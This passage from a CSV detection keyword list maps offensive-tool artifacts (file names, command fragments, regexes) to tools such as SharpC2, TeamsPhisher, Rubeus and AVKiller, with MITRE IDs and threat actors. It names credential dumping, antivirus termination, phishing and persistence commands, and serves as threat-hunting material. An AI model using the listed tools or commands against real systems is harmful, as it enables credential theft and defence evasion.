RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","61072"
"*TeamServer/Filters/InjectionFilters*",".{0,1000}TeamServer\/Filters\/InjectionFilters.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","61073"
"*TeamServer/Pivots/*.*",".{0,1000}TeamServer\/Pivots\/.{0,1000}\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","61074"
"*TeamServer\TeamServer.*",".{0,1000}TeamServer\\TeamServer\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","61075"
"*TeamsPhisher.git*",".{0,1000}TeamsPhisher\.git.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","Black Basta","Phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","N/A","10","1073","138","2024-06-19T21:41:55Z","2023-07-03T02:19:47Z","61076"
"*teamsphisher.log*",".{0,1000}teamsphisher\.log.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","Black Basta","Phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","N/A","10","1073","138","2024-06-19T21:41:55Z","2023-07-03T02:19:47Z","61077"
"*teamsphisher.py*",".{0,1000}teamsphisher\.py.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","Black Basta","Phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","N/A","10","1073","138","2024-06-19T21:41:55Z","2023-07-03T02:19:47Z","61078"
"*TeamsPhisher-main.zip*",".{0,1000}TeamsPhisher\-main\.zip.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","Black Basta","Phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","N/A","10","1073","138","2024-06-19T21:41:55Z","2023-07-03T02:19:47Z","61079"
"*teamstracker-main*",".{0,1000}teamstracker\-main.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","N/A","3","1","54","4","2024-06-27T11:57:35Z","2023-08-15T03:41:46Z","61080"
"*teamviewer_passwords.*",".{0,1000}teamviewer_passwords\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61092"
"*teamviewer_passwords.rb*",".{0,1000}teamviewer_passwords\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61093"
"*TeamViewerDecrypt.ps1*",".{0,1000}TeamViewerDecrypt\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","61102"
"*Technique #1 - Chop Chop - Create/delete*",".{0,1000}Technique\s\#1\s\-\sChop\sChop\s\-\sCreate\/delete.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","61108"
"*techspence/Adeleginator*",".{0,1000}techspence\/Adeleginator.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","1","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","61109"
"*techspence/ScriptSentry*",".{0,1000}techspence\/ScriptSentry.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","61110"
"*tecknicaltom/dsniff*",".{0,1000}tecknicaltom\/dsniff.{0,1000}","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec  pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well)","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","N/A","3","208","47","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z","61112"
"*Teensypreter.ino*",".{0,1000}Teensypreter\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","61113"
"*teilightomemaucd@gmx.com*",".{0,1000}teilightomemaucd\@gmx\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61114"
"*telegram2john.py*",".{0,1000}telegram2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","61117"
"*TelegramRAT-main*",".{0,1000}TelegramRAT\-main.{0,1000}","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","N/A","10","10","372","62","2024-01-23T12:05:59Z","2023-06-30T10:59:55Z","61118"
"*TELEMETRY.exe install *",".{0,1000}TELEMETRY\.exe\sinstall\s.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","N/A","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","61119"
"*TELEMETRY.exe install /command:*",".{0,1000}TELEMETRY\.exe\sinstall\s\/command\:.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","N/A","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","61120"
"*TELEMETRY.exe install /path:*",".{0,1000}TELEMETRY\.exe\sinstall\s\/path\:.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","N/A","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","61121"
"*TELEMETRY.exe install /url:*",".{0,1000}TELEMETRY\.exe\sinstall\s\/url\:.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","N/A","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","61122"
"*TelnetTrojXP (Original Code) by heroin*",".{0,1000}TelnetTrojXP\s\(Original\sCode\)\sby\sheroin.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","61124"
"*temp*\pp.exe*",".{0,1000}temp.{0,1000}\\pp\.exe.{0,1000}","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","0","N/A","N/A","N/A","1","20","3","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z","61126"
"*temp*KillDefender*",".{0,1000}temp.{0,1000}KillDefender.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","N/A","10","3","224","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z","61128"
"*temp*lsass_*.dmp*",".{0,1000}temp.{0,1000}lsass_.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","61129"
"*temp*whoami.txt*",".{0,1000}temp.{0,1000}whoami\.txt.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","61130"
"*Temp\\rubeus*",".{0,1000}Temp\\\\rubeus.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","#content","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","61131"
"*Temp\dumpert*",".{0,1000}Temp\\dumpert.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","61132"
"*Temp\graca.log*",".{0,1000}Temp\\graca\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","61133"
"*temp\iamahacker.txt*",".{0,1000}temp\\iamahacker\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","61134"
"*TEMP\ns.exe *",".{0,1000}TEMP\\ns\.exe\s.{0,1000}","offensive_tool_keyword","NetSess","Command line tool to enumerate NetBIOS sessions on a specified local or remote machine. ","T1016 - T1046 - T1087","TA0007 - TA0043","N/A","MUSTANG PANDA","Discovery","https://www.joeware.net/freetools/tools/netsess/","1","0","N/A","N/A","7","9","N/A","N/A","N/A","N/A","61136"
"*temp\pbind.exe*",".{0,1000}temp\\pbind\.exe.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","61137"
"*temp\stager.exe*",".{0,1000}temp\\stager\.exe.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","61138"
"*templates*CSExec.cs*",".{0,1000}templates.{0,1000}CSExec\.cs.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","61139"
"*templates*HIPS_LIPS_processes.txt*",".{0,1000}templates.{0,1000}HIPS_LIPS_processes\.txt.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","N/A","private github repo","10","","N/A","","","","61140"
"*templates*reflective_assembly_minified.ps1*",".{0,1000}templates.{0,1000}reflective_assembly_minified\.ps1.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","N/A","private github repo","10","","N/A","","","","61141"
"*templates/http_SCNotification.exe*",".{0,1000}templates\/http_SCNotification\.exe.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","61142"
"*templates/smb_SCNotification.exe*",".{0,1000}templates\/smb_SCNotification\.exe.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","61143"
"*tenable.com/downloads/nessus*",".{0,1000}tenable\.com\/downloads\/nessus.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","61144"
"*TerminateProcessFromId(ID(""360rp.exe"")*",".{0,1000}TerminateProcessFromId\(ID\(\""360rp\.exe\""\).{0,1000}","offensive_tool_keyword","AVKiller","forcibly close some anti-virus processes through process injection (taking 360 Security Guard and 360 Anti-Virus as examples)","T1055.011 - T1089","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/1y0n/AVKiller","1","0","N/A","N/A","10","2","127","18","2023-12-26T05:47:55Z","2023-12-19T00:55:23Z","61145"
"*TerminateProcessFromId(ID(""360rps.exe"")*",".{0,1000}TerminateProcessFromId\(ID\(\""360rps\.exe\""\).{0,1000}","offensive_tool_keyword","AVKiller","forcibly close some anti-virus processes through process injection (taking 360 Security Guard and 360 Anti-Virus as examples)","T1055.011 - T1089","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/1y0n/AVKiller","1","0","N/A","N/A","10","2","127","18","2023-12-26T05:47:55Z","2023-12-19T00:55:23Z","61146"
"*TerminateProcessFromId(ID(""360sd.exe"")*",".{0,1000}TerminateProcessFromId\(ID\(\""360sd\.exe\""\).{0,1000}","offensive_tool_keyword","AVKiller","forcibly close some anti-virus processes through process injection (taking 360 Security Guard and 360 Anti-Virus as examples)","T1055.011 - T1089","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/1y0n/AVKiller","1","0","N/A","N/A","10","2","127","18","2023-12-26T05:47:55Z","2023-12-19T00:55:23Z","61147"
"*TerminateProcessFromId(ID(""360tray.exe"")*",".{0,1000}TerminateProcessFromId\(ID\(\""360tray\.exe\""\).{0,1000}","offensive_tool_keyword","AVKiller","forcibly close some anti-virus processes through process injection (taking 360 Security Guard and 360 Anti-Virus as examples)","T1055.011 - T1089","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/1y0n/AVKiller","1","0","N/A","N/A","10","2","127","18","2023-12-26T05:47:55Z","2023-12-19T00:55:23Z","61148"
"*TerminateProcessFromId(ID(""ZhuDongFangYu.exe"")*",".{0,1000}TerminateProcessFromId\(ID\(\""ZhuDongFangYu\.exe\""\).{0,1000}","offensive_tool_keyword","AVKiller","forcibly close some anti-virus processes through process injection (taking 360 Security Guard and 360 Anti-Virus as examples)","T1055.011 - T1089","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/1y0n/AVKiller","1","0","N/A","N/A","10","2","127","18","2023-12-26T05:47:55Z","2023-12-19T00:55:23Z","61149"
"*Terminating Windows Defender?*",".{0,1000}Terminating\sWindows\sDefender\?.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","N/A","N/A","10","1","83","20","2025-03-21T16:33:42Z","2023-08-23T14:16:40Z","61150"
"*test_beef_debugs_spec*",".{0,1000}test_beef_debugs_spec.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","61153"
"*test_ccache_fromKirbi*",".{0,1000}test_ccache_fromKirbi.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","61154"
"*test_crawler.py*",".{0,1000}test_crawler\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","61155"
"*test_invoke_bof.x64.o*",".{0,1000}test_invoke_bof\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","N/A","10","10","250","35","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z","61156"
